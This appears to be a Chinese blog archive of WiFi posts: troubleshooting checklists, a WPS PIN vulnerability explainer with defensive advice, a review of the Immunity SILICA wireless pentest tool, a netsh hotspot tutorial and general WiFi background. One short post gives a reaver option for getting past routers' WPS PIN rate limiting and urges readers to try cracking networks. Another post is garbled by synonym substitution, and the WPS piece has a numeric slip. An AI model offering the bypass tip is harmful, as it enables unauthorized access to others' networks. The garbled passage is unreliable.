当然,通过上面的设置仍然不能解决间歇断网故障现象时,我们需要检查一下本地无线局域网中是否存在网络病毒攻击,因为一旦ARP网络受到病毒非法攻击的话,也有可能出现间歇断网故障。此时我们不妨在本地工作站系统中,打开本地连接属性设置窗口,然后进入到网卡设备的属性设置界面,在该界面中尝试修改一下网卡使用的IP地址,看看在新的IP地址条件下,间歇断网故障是否还能出现,要是该无线网络故障继续出现的话,我们一定要借助专业的抗病毒攻击的工具软件来保护无线局域网了。
Jan
25
2015
WiFi故障处理之软件:监视你的连接

尽管大部分优化WiFi网络的工作都只涉及硬件,但软件同样能发挥重要的作用。

还有一些软件程序可能也有帮助,可以显示你的IP地址以及数据能以多快的速度进出你的电脑。

如果你电脑上的程序运行很慢的话,WiFi安全测试可能会帮你找出原因。

WiFi故障排查清单

在采用所列出的建议后,你的无线网络传输距离和速度都应当大大增加。但这并不意味着你的网络完全不存在缺陷。以下是帮助你查看是否存在死连接(或弱连接)问题的9个步骤:

●1、确保电缆或DSL调制解调器与你的路由器相连接,所有设备都接通电源。

●2、重新启动路由器和PC来更新DHCP许可。

●3、打电话给Internet服务提供商,了解它是否正在维护或修理它的网络。

●4、检查是否使用了最新的固件及客户端软件。

●5、尝试利用LAN线缆连接到Internet,如果这种方法有效,那就是无线部分出了问题。

●6、来自无绳电话、微波炉或附近的大功率网络的干扰会让你的网络中断,尝试使用不同的信道。

●7、当连接太多客户端设备,或者有人上传或下载大量数据时,WiFi连接速度会变得很慢。当你注意到网速突然变慢,应立刻到网络上巡查一番,看看是否有人在看视频或做其他什么消耗带宽的事。

●8、如果你收到“IP冲突”的错误消息,请考虑使用静态IP地址。

●9、如果所有尝试都失败,干脆复位路由器,把它恢复到出厂配置,一切从新开始。
Jan
18
2015
WiFi故障处理之软件:监视你的连接

尽管大部分优化WiFi网络的工作都只涉及硬件,但软件同样能发挥重要的作用。

还有一些软件程序可能也有帮助,可以显示你的IP地址以及数据能以多快的速度进出你的电脑。

如果你电脑上的程序运行很慢的话,WiFi安全测试可能会帮你找出原因。

WiFi故障排查清单

在采用所列出的建议后,你的无线网络传输距离和速度都应当大大增加。但这并不意味着你的网络完全不存在缺陷。以下是帮助你查看是否存在死连接(或弱连接)问题的9个步骤:

●1、确保电缆或DSL调制解调器与你的路由器相连接,所有设备都接通电源。

●2、重新启动路由器和PC来更新DHCP许可。

●3、打电话给Internet服务提供商,了解它是否正在维护或修理它的网络。

●4、检查是否使用了最新的固件及客户端软件。

●5、尝试利用LAN线缆连接到Internet,如果这种方法有效,那就是无线部分出了问题。

●6、来自无绳电话、微波炉或附近的大功率网络的干扰会让你的网络中断,尝试使用不同的信道。

●7、当连接太多客户端设备,或者有人上传或下载大量数据时,WiFi连接速度会变得很慢。当你注意到网速突然变慢,应立刻到网络上巡查一番,看看是否有人在看视频或做其他什么消耗带宽的事。

●8、如果你收到“IP冲突”的错误消息,请考虑使用静态IP地址。

●9、如果所有尝试都失败,干脆复位路由器,把它恢复到出厂配置,一切从新开始。
Jan
18
2015
一、避开旌旗灯号死角

有时我们把标识表记标帜本电脑移到回到卧室,会发现旌旗灯号强度俄然降低,网速形同蜗牛,更有甚者连一点旌旗灯号也没有。这声名我们所处的位置正好是旌旗灯号的盲区或死角,应该实时调整无线路由器的放置地址,使其旌旗灯号能够笼盖房间的所有面积。

提醒:

如不美观房间面积斗劲年夜(好比复式小高层),可以给无线路由器安装增益天线,能够年夜幅增添无线路由器的旌旗灯号笼盖规模。

二、自动修复无线收集

操作系统中供给了自动修复收集的功能,在无线收集出问题时可操作该功能修复无线收集。打开“节制面板”的“收集共享中心”,单击窗口子侧的“诊断和修复”链接,系统就会自动修复无线收集,适合对收集设置不太熟悉的初级用户。

三、重启无线路由器

一般在设置无线路由器时,我们城市选择自动分配IP地址。有时会因为远程处事器分配IP地址不实时,造成无线收集没有响应。碰着此种情形,重启无线路由器就会年夜头获得新的IP地址,恢复正常。或者可以断开标识表记标帜本与无线路由器的毗连,等几秒钟后再年夜头毗连。这两种体例能解决良多断网的故障,很是适用。
Jan
8
2015
在破解WiFi网络时候,很多路由器厂商也逐渐意识到PIN码破解的问题,部分无线路由器厂商会增加一些PIN暴力破解防护,在破解这些无线路由器的时候会出现这样的提示:‍‍‍‍

---------------------------------------------------------------------------------

           warning:detected ap rate limiting,xxxxx

----------------------------------------------------------------------------------

‍‍但是经过实践发现,绝大部分路由器会在约60秒后解除限制,这时只需要在reaver 命令里面添加 –l 3 参数,-l 参数是指reaver间隔多久对已经限制了尝试PIN的路由器进行再次尝试破解,命令默认为300,通过设置为3后,大概探测20次约一分后就会开始新的破解,尝试10次PIN码后再次等待约一分钟,如此往复。所以在此类有一些PIN防护的路由器上,破解PIN码速率大约为11 ([60+5*10]/10)seconds/pin,根据之前的公式计算,破解出PIN的最大时间成本为33.6 hour(11*11000/60/60),破解无线网络突破防Pin60秒无线路由器,可以尝试下!
Dec
23
2014
第1页:WPS加密惊爆安全漏洞

当今社会,生活节奏越来越快,一款网络设备是不是具有简单易用的特性,甚至决定了它的生存及竞争能力。对于无线路由器来讲,也是如此。从起初的手动加密到现在主流路由都具有的WPS一键加密,加密方式是变得简单快捷了,但安全性能是不是仍旧稳定可靠呢?答案不再是肯定的了。下面我们就首先来看看由美国计算机应急准备小组(US-CERT) 安全研究员Stefan Viehbock所发现的惊人漏洞,是如何将整个路由界的安全问题暴露在2012年的阳光下的吧。



WPS加密惊爆安全漏洞
就在距离2012还有几天的2011年底,安全研究员Stefan Viehbock在其博客上公布了WPS存在着安全漏洞,而且涉及了多家厂商的大量的无线设备。由于该漏洞的细节已经公开。换句话说,黑客们也已经知道了这个安全漏洞,并将毫无疑问地利用该漏洞进行攻击。因此美国计算机应急准备小组(US-CERT)警告说,数以百万计的家庭无线路由器将有可能面临被黑客PJ网络密码。
Stefan Viehbock在其博客上公布了WPS存在安全漏洞
WPS(Wi-Fi Protected Setup)是Wi-Fi保护设置的英文缩写。WPS是由Wi-Fi联盟组织实施的认证项目,主要致力于简化无线局域网安装及安全性能的配置工作。WPS并不是一项新增的安全性能,它只是使现有的安全技术更容易配置。
US-CERT也在报告中列出了受到该漏洞影响的有多家无线路由器制造商。
下面我们再来看看WPS的加密原理。
对于一般用户,WPS提供了一个相当简便的加密方法。通过该功能,不仅可将都具有WPS功能的Wi-Fi设备和无线路由器进行快速互联,还会随机产生一个八位数字的字符串作为个人识别号码(PIN)进行加密操作。省去了客户端需要连入无线网络时,必须手动添加网络名称(SSID)及输入冗长的无线加密密码的繁琐过程。
那么,黑客会用多长时间PJ出使用WPS加密的PIN码呢?一起看看吧。

第2页:WPS漏洞致2小时内PJPIN码

WPS漏洞致2小时内PJPIN码
PJ网络需要多长时间?是黑客们首要关心的问题。如果PJ时间需要几天或者几个星期,甚至是一个无终止的时间,该漏洞可能就不会这样引起黑客的重视了。


水星无线路由PIN码信息
应用穷举暴力PJ的方法来获得PIN码,从原理上讲是较为简单的一种,但黑客面对着10的8次方,1亿种可能性时,这种方法变得不切实际了。
PIN码认证过程
有人曾经做过一个测试,在3K/sec的计算机上穷举8位全数字的WPA密码需要8个小时才能完成。如果PIN码是随机的8位,考虑信号不佳,设备负载过重,还有等待PIN认证结果的合理延迟(如果PIN码验证失败,程序会等待很长一段时间才会提示,这里特指QSS软件)等因素……短时间内想搞定WPA加密都觉得不大现实。可能有人认为,10小时搞不定,可以花100小时、1000小时搞定。但这样付出的人力物力,真的物有所值吗?除非是一个有着重大意义的无线AP,才值得黑客这样去做吧。
但Viehbock所发现的漏洞,将会使WPS变得较为容易被暴力穷举PIN的方法所PJ。他称利用该漏洞可以轻易地在2小时内PJWPS使用的PIN码。在此消息发布后,Tactical Network Solutions(TNS)安全公司表示早在一年之前,他们就已经发现了该漏洞,但出于漏洞涉及面广的考量并未公布。但现在出于宣传目的,TNS放出了免费版的PIN码PJ工具。随后,令人颇感无语的是,Stefan Viehbock也在网上发布了可将PJ时间缩短到2个小时以内的WPSPJ工具。
现在PJ工具也被提供了,这简直就是黑客的福音嘛。而且经上述两款工具的PJ后,一旦获得WPA密码,即使用户关闭了WPS功能,黑客同样也可以通过WPA密码连上网络。

第3页:WPS漏洞分析和解决方案 总结

WPS漏洞分析和解决方案
先来看看对WPS漏洞的分析。
WPS漏洞分析
我们再看看WPS安全漏洞究竟存在着什么样的设计缺陷,让暴力PJ变得如此轻松呢?
首先,在WPS加密中PIN码是网络设备间获得接入的唯一要求,不需要其他身份识别方式,这就让暴力PJ变得可行。
其次,WPS PIN码的第8位数是一个校验和(checksum),因此黑客只需算出前7位数即可。这样,唯一的PIN码的数量降了一个级次变成了10的7次方,也就是说有1000万种变化。


实施PIN的身份识别时路由器认证原理
再次,在实施PIN的身份识别时,接入点(无线路由器)实际上是要找出这个PIN的前半部分(前4位)和后半部分(后3位)是否正确即可。Viehbock称当第一次PIN认证连接失败后,路由器会向客户端发回一个EAP-NACK信息,而通过该回应,攻击者将能够确定的PIN前半部或后半部是否正确。换句话说,黑客只需从7位数的PIN中找出一个4位数的PIN和一个3位数的PIN。这样一来,级次又被降低,从1000万种变化,减少到11000(10的4次方+10的3次方)种变化。
因此,在实际PJ尝试中,黑客最多只需试验11000万次,平均只需试验大约5500次就能PJ。这也证实了在2小时内PJPIN码的可行性。

WPS漏洞的解决方案

下面我们再来看看对于WPS漏洞的解决方案。
现在针对该WPS漏洞,目前尚没有一个好的解决方案。大多数的无线路由器又没有限制密码出错次数的功能,这使得它们都赤裸裸地暴露在黑客的PJ攻击下。
实际上,用户还是能够通过及时地禁用WPS来避免遭到攻击,但大多数人可能还没意识到它的严重性而将之关闭。
因此我们建议仍在使用WPS进行无线加密的朋友,在你的网络密码还没被攻击PJ之前,马上禁用WPS功能,并且使用WPA2等更为安全的加密方法进行无线密码设置,同时禁用通用即插即用功能,启用MAC地址过滤功能,才能较为有效地保护你无线网络的安全使用。
Apr
15
2012
  Immunity SILICA无线套装工具是美国ImmunitySec公司出品的一款轻便手持式无线渗透测试产品,利用提供的独特测试工具对网络进行测试,可以支持支持802.11a/b/g/n 网络,基于蓝牙的以太网络。笔者有幸获得这套工具的试用套件,完全手持式设备,在自己的无线网络上试用了一下。
  一.套件内容
  该试用套件包括一个8G的U盘, Atheros的无线网卡及外连加强天线。其中U盘是一个含有Ubuntu的虚拟机器拷贝,里面有Immunity SILICA的应用(跟大家留下了丰富的定制空间)。
  二.测试过程
  2.1 Immunity Silica的无线信号探测
  笔者将Atheros网卡联入自己的windows7机器,将U盘里的虚拟机器拷贝到硬盘中,然后使用VMware Player播放器打开虚拟机,过程很简单,虚拟机器启动完毕,就会自动弹出Immunity SILICA的程序窗口,同时,Immunity SILICA会自动扫描周围无线网络信号,如图1.
  图1
  点击在新窗口中浏览此图片
  点击主窗口中的stop图标,就会结束无线网络信号扫描过程。从扫描获得的信息来看,包含了SSID名字,无线AP的MAC地址及厂商信息,信号强度,无线频道,认证加密方式,AP类型等(图2)。
  图2
  点击在新窗口中浏览此图片
  2.2  Immunity Silica的无线密钥恢复功能
  最引人注意的是Recovered Key项,据官方资料显示,Immunity SILICA可以恢复WEP,WAP1/2等无线认证加密的密码,笔者赶紧试了一下。很容易从上图中找到笔者使用AP的SSID是dlinkhome. channel是1,采用的是WPA加密协议.
  图3
  点击在新窗口中浏览此图片
  笔者首先选择我的AP,单击右键,选择Discover Key,程序开始自动破译密码,如果运气好的话,在对应AP的Discover Key项中就会自动出现密码。
  2.3  Immunity Silica 无线网络扫描
  等了半天,也没有出现密码,可能我的AP很安全(我知道破解WPA是相当有难度的)。笔者干脆选择Edit Key(图3),输入了自己的密码,看看后面还能做些什么(图4)。
  图4
  点击在新窗口中浏览此图片
  输入密码后,我在单击我的AP右键,发现菜单有了变化。如图5:
  图5
  点击在新窗口中浏览此图片
  接着笔者选择Network Probe试试。从主窗口中的Log选项可以看到程序的一些运行状态。完成后,可以在程序Report目录找到详细的报告(图6),该AP及其终端的情况还是很准确的。这些信息应该可以让Immunity CANVAS(一款专业的渗透测试工具)利用到。
  图6
  点击在新窗口中浏览此图片
  2.4 Imminity Silica 抓取无线网络Cookies
  笔者在选择Passive session hijacking,程序会自动调出WireShark数据抓包工具,收集无线网络数据包,在我的环境中,抓取到了一条cookie viewer信息,如图7:
  图7
  点击在新窗口中浏览此图片
  按照官方说明,如果cookie信息含有登录认证信息,可以直接利用该信息访问到需登录的页面内容。其它的如Attack, MITM攻击功能据说也很强大,但受限于笔者的环境,未能一一测试。
  评测总结:
  笔者对这款无线安全工具的自动化程度印象十分深刻,很多操作几乎不需要手工操作。换一种思维来说,如果某个无线网络能轻松的被Immunity SILICA恢复出密码,获取重要信息, 成功攻击的话,说明该无线网络的安全十分堪忧,值得引起管理者足够的重视。
  简言之,笔者觉得 Immunity SILICA还是一个可让用户自由定制的工具,充分利用了开放源码的操作系统作为平台,无缝搭配CANVAS测试框架,是确保或审计无线网络安全一款强有力的工具,值得向大家推荐。
Apr
5
2012
wifi是什么?
简单说,wifi就是相互连通。在家里,wifi可以实现手机、电脑、播放器和其他设备的共享 - 不需要任何线缆。无论在办公室、机场或者咖啡厅,你可以随时随地通过wifi连接互联网进行工作,即使你离家很远。现在可以想象一下一切都将变得简单和便捷,再也不用为找有线的网络而烦恼。这就是wifi。
wifi怎么工作?
wifi网络运通过802.11无线技术提供安全、可靠、快速的无线连接。wifi网络可用于电子设备与电子设备、互联网和使用以太网技术的有线网络连接。wifi网络工作在2.4和5G两个频段,有些wifi设备可以同时使用两个频段(双频段)。wifi网络的真实体验和有线网络类似。
wifi是为我量身定制的吗?
大公司和学校使用企业级的信息技术和wifi认证的产品将标准的有线网络扩展到公共区域,像会议室、培训室和大型礼堂。很多公司也为户外工作或者远距离办公的员工在家里或者远程办公室提供无线网络。大公司和学校经常使用wifi实现大楼之间的互联。
小公司也会使用wifi网络,用于实现移动办公的销售人员、固定办公人员、背后的投资人以及财务人员的相互通信。
家庭办公室已经从wifi技术收益。在家里工作是非常舒服的,你只需一个简单的接入点就可以实现电脑、打印机、扫描仪、职能手机、音频设备和其他无线设备的相互连接,所以你的办公桌下面不会再有各种线缆了。
wifi技术
今天wifi产品能做任何事情,从发送邮件到传输视频以及电话会议。甚至能够连接100尺外的无线网络,当然连接距离会因为门厅的阻挡而减少。各种形状、形式的wifi产品能够满足你所有的需求,有些甚至非常便宜。
wifi能走到今天是无数公司、科技人员和工程师同心协力的结果。90年代中,来自许多公司的专家通过IEEE这个国际联盟聚在一起工作,为实现新无线产品的相互连接开发新的行业标准。wifi联盟从这次合作中诞生,在全世界拥有此类标准的开发测试实验室,拥有检测产品是否满足可用性和安全标准。
频段
wifi产品通过无线电波工作,就像手机、感应门、电视、收音机、GPS和微波炉。每一种无线电波产品有对应频谱的一个频段。
无线带宽的例子
AM广播(530-1610 kHz)
短波频段(5.9-26.1 MHz)
私人频段(26.965-27.405 MHz)
电视频道2-6 (54-88 MHz)
FM广播频段(88-108 MHz)
Wi-Fi (2.4GHz or 5GHz)
wifi产品工作在2.4GHZ或者5GHZ频段。这些频段是不需要政府授权,个人可免费使用的,不像电视和收音机必须使用授权频段。正是由于wifi频段的免费,保证产品通过wifi联盟的可用性标准对于制造商显得更加重要。因为这些产品和非wifi产品共享频段,比如遥控玩具等,认证测试能保证wifi产品不会干扰其他产品,同时也不会被其他产品干扰。
可用性
可用性意味着不同公司的产品能够一起工作,因此用户不会限制于一个品牌的wifi产品。超过400家wifi联盟会员公司的wifi产品会进行wifi认证,这意味着你有着大量的产品可以选择,而不用担心产品的相互兼容问题。
802.11是什么
今天的wifi产品是由Dewey Decimal-like system指定的,该系统被IEEE开发出来区分不同各种技术簇。wifi产品都将贴上802.11的标识,并且将来标识更加详细体现具体实现的技术,比如 802.11a。每个标识集会根据相关的性能、频率、带宽特性定义。每一代技术也会加强安全性能,也会包括其他的特性,当然制造商可根据实际情况选择。
目前总共有4代wifi产品,越来越多正在使用的标准正加入新的特性、提高性能和安全性。每一代都会根据一系列的性能参数定义,包括性能、频率和带宽。每一代技术也会加强安全性能,也会包括其他的特性,当然制造商可根据实际情况选择
点击在新窗口中浏览此图片
wifi认证测试是为保证产品能够兼容前几代工作在相同频率的wifi产品。举个例子,
通过wifi 802.11g认证产品表明该产品不仅符合802.11g,并且能够和wifi 802.11b或者802.11n认证的产品(支持2.4GHz)一起工作。这意味着你可以将新的设备接入现有的wifi网络,并且不用担心兼容问题。
Wifi认证的产品会贴上logo标识表明该产品满足所有标识上注释的标准。
Apr
5
2012
适用范围:
  1.WIN7平台电脑
  2.笔记本或带有WIFI模块的台式电脑
  3.搜索不到win7新建的临时网络的M9
生成wifi网络属性:
  1.WLAN是802.11g标准
  2.带宽为54Mbps
开启windows 7的隐藏功能:虚拟WiFi和SoftAP(即虚拟无线AP)

方法如下:
1.以管理员身份运行命令提示符:
  快捷键win+R→输入cmd→回车
点击在新窗口中浏览此图片
2.启用并设定虚拟WiFi网卡:
  运行命令: netsh wlan set hostednetwork mode=allow ssid=meizuPC key=bulukaWiFi
注意:
下面参数可以自由变换
                  mode:是否启用虚拟WiFi网卡,改为disallow则为禁用。
                  ssid:无线网名称,最好用英文(以meizuPC为例)。
                  key:无线网密码,八个以上字符(以bulukaWiFi为例)。
以上三个参数可以单独使用,例如只使用mode=disallow可以直接禁用虚拟Wifi网卡。
点击在新窗口中浏览此图片
点击在新窗口中浏览此图片
开启成功后,网络连接中会多出一个网卡为“Microsoft Virtual WiFi Miniport Adapter”的无线连接2,为方便起见,将其重命名为“魅族WIFI”。若没有,只需更新无线网卡驱动就OK了。
3.设置Internet连接共享:
  在“网络连接”窗口中,右键单击已连接到Internet的网络连接,选择“属性”→“共享”,勾上“允许其他??????连接(N)”并选择“魅族WiFi”
点击在新窗口中浏览此图片
4.开启无线网络:
继续在命令提示符中运行:netsh wlan start hostednetwork
点击在新窗口中浏览此图片
(将start改为stop即可关闭该无线网,以后开机后要启用该无线网只需再次运行此命令即可)
在次打开网络连接页面:
我们会发现"魅族WIFI"旁边的红叉已经消失,无线AP开启成功
点击在新窗口中浏览此图片
5.体验高速上网
  因为写此教程是M9尚未在手上,就拿M8截图给大家看看
点击在新窗口中浏览此图片
注意:
1.无线AP密码为命令中"key"中的:bulukaWIFI  (可自由修改)
===========================
附录:
1.显示无线网络信息命令:netsh wlan show hostednetwork



如果觉得敲键盘输命令很繁琐 那么就做个批处理吧:

@echo off
choice /C 12 /M "开启wifi请输入1,关闭wifi请输入2
if errorlevel 2 goto off
if errorlevel 1 goto on
:on
netsh wlan start hostednetwork
goto end
:off
netsh wlan stop hostednetwork
goto end
:end
echo 网络设置完毕

将上述代码复制在记事本内,修改记事本后缀名,即TXT修改成BAT格式即可!
Mar
25
2012
无线WiFi以及WLAN技术基础知识介绍 
  IEEE 802.11b无线网络规范是IEEE 802.11网络规范的变种,最高带宽为11 Mbps,在信号较弱或有干扰的情况下,带宽可调整为5.5Mbps、2Mbps和1Mbps,带宽的自动调整,有效地保障了网络的稳定性和可靠性。其主要特性为:速度快,可靠性高,在开放性区域,通讯距离可达305米,在封闭性区域,通讯距离为76米到122米,方便与现有的有线以太网络整合,组网的成本更低。
  WiFi Wireless Fidelity,无线保真技术与蓝牙技术一样,同属于在办公室和家庭中使用的短距离无线技术。该技术使用的使2.4GHz附近的频段,该频段目前尚属没用许可的无线频段。其目前可使用的标准有两个,分别是IEEE802.11a和IEEE802.11b。该技术由于有着自身的优点,因此受到厂商的青睐。
  WiFi技术突出的优势在于:
  其一,无线电波的覆盖范围广,基于蓝牙技术的电波覆盖范围非常小,半径大约只有50英尺左右约合15米,而WiFi的半径则可达300英尺左右约合100米,办公室自不用说,就是在整栋大楼中也可使用。最近,由Vivato公司推出的一款新型交换机。据悉,该款产品能够把目前WiFi无线网络300英尺接近100米的通信距离扩大到4英里约6.5公里。
  其二,虽然由WiFi技术传输的无线通信质量不是很好,数据安全性能比蓝牙差一些,传输质量也有待改进,但传输速度非常快,可以达到11mbps,符合个人和社会信息化的需求。
  其三,厂商进入该领域的门槛比较低。厂商只要在机场、车站、咖啡店、图书馆等人员较密集的地方设置“热点”,并通过高速线路将因特网接入上述场所。这样,由于“热点”所发射出的电波可以达到距接入点半径数十米至100米的地方,用户只要将支持无线LAN的笔记本电脑或PDA拿到该区域内,即可高速接入因特网。也就是说,厂商不用耗费资金来进行网络布线接入,从而节省了大量的成本。
  根据无线网卡使用的标准不同,WiFi的速度也有所不同。其中IEEE802.11b最高为11Mbps(部分厂商在设备配套的情况下可以达到22Mbps),IEEE802.11a为54Mbps、IEEE802.11g也是54Mbps
  WiFi是由AP(Access Point)和无线网卡组成的无线网络。AP一般称为网络桥接器或接入点,它是当作传统的有线局域网络与无线局域网络之间的桥梁,因此任何一台装有无线网卡的PC均可透过AP去分享有线局域网络甚至广域网络的资源,其工作原理相当于一个内置无线发射器的HUB或者是路由, 而无线网卡则是负责接收由AP所发射信号的CLIENT端设备。
  而wireless b/g表示网卡的型号,按照其速度与技术的新旧可分为802.11a、802.11b、802.11g 。
  讲起无线网,大家都有一种似是而非的感觉,无线是否简单地两台计算机互联?No!这已经是上个世纪的无线概念,新一代的无线网络,将以无须布线和使用相对自由,建立起人们对无线局域网的全新感受。需求决定了市场的发展,很少见到哪种IT技术或是产品能够象它样有如此迅猛的增长势头,不受任何约束随时随地访问互联网不再是梦想,其中,WiFi发挥了至关重要的作用。WiFi代表了"无线保真",指具有完全兼容性的802.11标准IEEE802.11b子集,它使用开放的2.4GHz直接序列扩频,最大数据传输速率为11Mbps,也可根据信号强弱把传输率调整为5.5Mbps、2Mbps和1Mbps带宽。无需直线传播传输范围为室外最大300米,室内有障碍的情况下最大100米,是现在使用的最多的传输协议。它与有线网络相较之下,有许多优点:
  无须布线
  WiFi最主要的优势在于不需要布线,可以不受布线条件的限制,因此非常适合移动办公用户的需要,具有广阔市场前景。目前它已经从传统的医疗保健、库存控制和管理服务等特殊行业向更多行业拓展开去,甚至开始进入家庭以及教育机构等领域。
  健康安全
  IEEE802.11规定的发射功率不可超过100毫瓦,实际发射功率约60~70毫瓦,这是一个什么样的概念呢?手机的发射功率约200毫瓦至1瓦间,手持式对讲机高达5瓦,而且无线网络使用方式并非像手机直接接触人体,应该是绝对安全的。
  简单的组建方法
  一般架设无线网络的基本配备就是无线网卡及一台AP,如此便能以无线的模式,配合既有的有线架构来分享网络资源,架设费用和复杂程序远远低于传统的有线网络。如果只是几台电脑的对等网,也可不要AP,只需要每台电脑配备无线网卡。AP为Access Point简称,一般翻译为“无线访问节点”,或“桥接器”。它主要在媒体存取控制层MAC中扮演无线工作站及有线局域网络的桥梁。有了AP,就像一般有线网络的Hub一般,无线工作站可以快速且轻易地与网络相连。特别是对于宽带的使用,WiFi更显优势,有线宽带网络(ADSL、小区LAN等)到户后,连接到一个AP,然后在电脑中安装一块无线网卡即可。普通的家庭有一个AP已经足够,甚至用户的邻里得到授权后,则无需增加端口,也能以共享的方式上网。
  长距离工作
  别看无线WiFi的工作距离不大,在网络建设完备的情况下,802.11b的真实工作距离可以达到100米以上,而且解决了高速移动时数据的纠错问题、误码问题,WiFi设备与设备、设备与基站之间的切换和安全认证都得到了很好的解决。
  WiFi的发展和未来
  这两年内,无线AP的数量呈迅猛的增长,无线网络的方便与高效使其能够得到迅速的普及。除了在目前的一些公共地方有AP之外,国外已经有先例以无线标准来建设城域网,因此,WiFi的无线地位将会日益牢固。
  WiFi是目前无线接入的主流标准,但是,WiFi会走多远呢?在Intel的强力支持下,WiFi已经有了接班人。它就是全面兼容现有WiFi的WiMAX,对比于WiFi的802.11X标准,WiMAX就是802.16x。与前者相比,WiMAX具有更远的传输距离、更宽的频段选择以及更高的接入速度等等,预计会在未来几年间成为无线网络的一个主流标准,Intel计划将来采用该标准来建设无线广域网络。这相比于现时的无线局域网或城域网,是质的变革,而且现有设备仍能得到支持,保护人们的每一分钱投资。
  总而言之,家庭和小型办公网络用户对移动连接的需求是无线局域网市场增长的动力,虽然到目前为止,美国、日本等发达国家仍然是目前WiFi用户最多的地区,但随着电子商务和移动办公的进一步普及,廉价的WiFi,必将成为那些随时需要进行网络连接用户的必然之选。
  最近,业界纷纷传出WiFi已出现生存危机的消息。据国外媒体报道,日前很多企业仍然在WiFi这方面投入巨资,但从中赢利的企业几乎没有。据悉很多企业因WiFi而破产,前不久R Wireless公司也放弃了该项业务。那么WiFi的盈利情况是否真的出现危机了?
  不可否认,WiFi技术的商用目前碰到了许多困难。一方面是受制于WiFi技术自身的限制,比如其漫游性、安全性和如何计费等都还没有得到妥善的解决。另一方面,由于WiFi的赢利模式不明确,如果将WiFi作为单一网络来经营,商业用户的不足会使网络建设的投资收益比较低,因此也影响了电信运营商的积极性。但从WiFi技术定位看,我认为,对于电信运营商而言,WiFi技术的定位主要是作为高速有线接入技术的补充,将来逐渐也会成为蜂窝移动通信的补充。
  虽然WiFi技术的商用在目前碰到了一些困难,但这种先进的技术也不可能包办所有功能的通信系统。可以说只有各种接入手段相互补充使用才能带来经济性、可靠性和有效性。因而,它可以在特定的区域和范围内发挥对3G的重要补充作用,WiFi技术与3G技术相结合将具有广阔的发展前景。
  WiFi是高速有线接入技术的补充
  目前,有线接入技术主要包括以太网、xDSL等。WiFi技术作为高速有线接入技术的补充,具有为可移动性、价格低廉的优点,WiFi技术广泛应用于有线接入需无线延伸的领域,如临时会场等。由于数据速率、覆盖范围和可靠性的差异,WiFi技术在宽带应用上将作为高速有线接入技术的补充。 而关键技术无疑决定着WiFi的补充力度。现在OFDM、MIMO(多入多出)、智能天线和软件无线电等,都开始应用到无线局域网中以提升WiFi性能,比如说802.11n计划采用MIMO与OFDM相结合,使数据速率成倍提高。另外,天线及传输技术的改进使得无线局域网的传输距离大大增加,可以达到几公里。
  WiFi是蜂窝移动通信的补充
  WiFi技术的次要定位——蜂窝移动通信的补充。蜂窝移动通信可以提供广覆盖、高移动性和中低等数据传输速率,它可以利用WiFi高速数据传输的特点弥补自己数据传输速率受限的不足。而WiFi不仅可利用蜂窝移动通信网络完善的鉴权与计费机制,而且可结合蜂窝移动通信网络广覆盖的特点进行多接入切换功能。这样就可实现WiFi与蜂窝移动通信的融合,使蜂窝移动通信的运营锦上添花,进一步扩大其业务量。
  WiFi是现有通信系统的补充,可看作是3G的一种补充
  无线接入技术则主要包括IEEE的802.11、802.15、802.16和802.20标准,分别指WLAN、无线个域网WPAN:蓝牙与uwb、无线城域网WMAN:WIMAX和宽带移动接入WBMA等。一般地说WPAN提供超近距离的无线高数据传输速率连接;WMAN提供城域覆盖和高数据传输速率;WBMA提供广覆盖、高移动性和高数据传输速率;WiFi则可以提供热点覆盖、低移动性和高数据传输速率。
  对于电信运营商来说,WiFi技术的定位主要是作为高速有线接入技术的补充,逐渐也会成为蜂窝移动通信的补充。当然WiFi与蜂窝移动通信也存在少量竞争。一方面,用于WiFi的IP话音终端已经进入市场,这对蜂窝移动通信有一部分替代作用。另一方面,随着蜂窝移动通信技术的发展,热点地区的WiFi公共应用也可能被蜂窝移动通信系统部分取代。但是总的来说,他们是共存的关系,比如一些特殊场合的高速数据传输必须借助于WiFi,象波音公司提出的飞机内部无线局域网;而在另外一些场合使用WiFi可以较为经济,象实现高速列车内部的无线局域网时。
  此外,从当前WiFi技术的应用看,其中热点公共接入在运营商的推动下发展较快,但用户数少并缺乏有效的盈利模式,使WiFi呈现虚热现象。所以,WiFi虽然是通信业中发展的新亮点,但是主要应定位于现有通信系统的补充。如果炒作过热,面对相对狭小的市场可能出现投资过度和资源闲置的状况。据报道,在美国T-Mobile移动通讯公司经营的遍布2000多家星巴克咖啡厅的“热点”网络,平均每天只有不到两个人使用,而运营商为此每个月就要花费数百美元。
  另外目前公共接入服务的应用,除了上网、接收email等既有应用之外,并未出现对使用者而言具有独占性、迫切性、必要性之应用服务,可使消费者产生另一种新的使用需求,这也是它难以大量吸引用户族群的原因。百年来通信发展的历史证明,使用一种包办所有功能的通信系统是不可取的,各种接入手段的混合使用才能带来经济性、可靠性和有效性的同时提高。毫无疑问,第三代蜂窝移动通信(3G)技术是一个比较完美的系统,它有较高的技术先进性、较强的业务能力和广泛的应用。但是WiFi可以在特定的区域和范围内发挥对3G的重要补充作用,WiFi技术与3G技术相结合会有广阔的发展前景。
Jan
22
2012
保护Wi-Fi无线网络安全的十一个技巧
  Wi-Fi生来就容易受到黑客攻击和窃听。但是,如果你使用正确的安全措施,Wi-Fi可以是安全的。遗憾的是网站上充满了过时的忠告和误区。下面是Wi-Fi安全中应该做的和不应该做的一些事情。
  1.不要使用WEP
  WEP(有线等效加密协议)安全早就死了。大多数没有经验的黑客能够迅速地和轻松地突破基本的加密。因此,你根本就不应该使用WEP。如果你使用WEP,请立即升级到具有802.1X身份识别功能的802.11i的WPA2(WiFi保护接入)协议。如果你有不支持WPA2的老式设备和接入点,你要设法进行固件升级或者干脆更换设备。
  2.不要使用WPA/WPA2-PSK
  WPA/WPA2安全的预共享密钥(PSK)模式对于商务或者企业环境是不安全的。当使用这个模式的时候,同一个预共享密钥必须输入到每一个客户。因此,每当员工离职和一个客户丢失或失窃密钥时,这个PSK都要进行修改。这在大多数环境中是不现实的。
  3.一定要应用802.11i
  WPA和WPA2安全的EAP(可扩展身份识别协议)模式使用802.1X身份识别,而不是PSK,向每一个用户和客户提供自己的登录证书的能力,如用户名和口令以及一个数字证书。
  实际的加密密钥是在后台定期改变和交换的。因此,要改变或者撤销用户访问,你要做的事情就是在中央服务器修改登录证书,而不是在每一台客户机上改变PSK。这种独特的每个进程一个密钥的做法还防止用户相互窃听对方的通讯。现在,使用火狐的插件Firesheep和Android应用DroidSheep等工具很容易进行窃听。
  要记住,为了达到尽可能最佳的安全,你应该使用带802.1X的WPA2。这个协议也称作802.1i。
